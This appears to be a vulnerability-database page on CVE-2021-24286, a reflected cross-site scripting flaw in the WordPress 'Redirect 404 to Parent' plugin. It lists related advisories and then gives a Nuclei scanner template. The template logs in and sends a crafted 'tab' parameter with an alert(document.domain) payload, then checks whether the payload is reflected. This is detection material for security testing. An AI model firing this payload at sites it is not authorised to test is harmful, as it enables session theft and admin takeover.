| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| WordPress Redirect 404 to Parent 1.3.0 Plugin - Reflected Cross-Site Scripting Vulnerability | 29 Sep 202100:00 | – | zdt | |
| WordPress plugin 跨站脚本漏洞 | 14 May 202100:00 | – | cnnvd | |
| CVE-2021-24286 | 14 May 202111:38 | – | cve | |
| CVE-2021-24286 Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS) | 14 May 202111:38 | – | cvelist | |
| WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting | 29 Sep 202100:00 | – | exploitdb | |
| CVE-2021-24286 | 14 May 202112:15 | – | nvd | |
| CVE-2021-24286 | 14 May 202112:15 | – | osv | |
| WordPress Redirect 404 To Parent 1.3.0 Cross Site Scripting | 29 Sep 202100:00 | – | packetstorm | |
| WordPress Redirect 404 to parent plugin <= 1.3.0 - Reflected Cross-Site Scripting (XSS) vulnerability | 23 Apr 202100:00 | – | patchstack | |
| Cross site scripting | 14 May 202112:15 | – | prion |
id: CVE-2021-24286
info:
name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
impact: |
Attackers can inject malicious JavaScript via reflected XSS in the settings page, potentially stealing administrator session cookies or performing administrative actions.
remediation: Fixed in version 1.3.1
reference:
- https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
- https://www.exploit-db.com/exploits/50350
- https://nvd.nist.gov/vuln/detail/CVE-2021-24286
- https://wordpress.org/plugins/redirect-404-to-parent/
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24286
cwe-id: CWE-79
epss-score: 0.13942
epss-percentile: 0.96094
cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: mooveagency
product: redirect_404_to_parent
framework: wordpress
tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")'
- 'status_code_2 == 200'
condition: and
# digest: 4b0a004830460221008dc8200305eb87bdcceb93b9abee448bd173727f7cdec2efb5d2c3d663cc8fd1022100f9cb1a04a961805ce8354bd3e993b068ea3574e069fa561ad5abab367e39e226:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation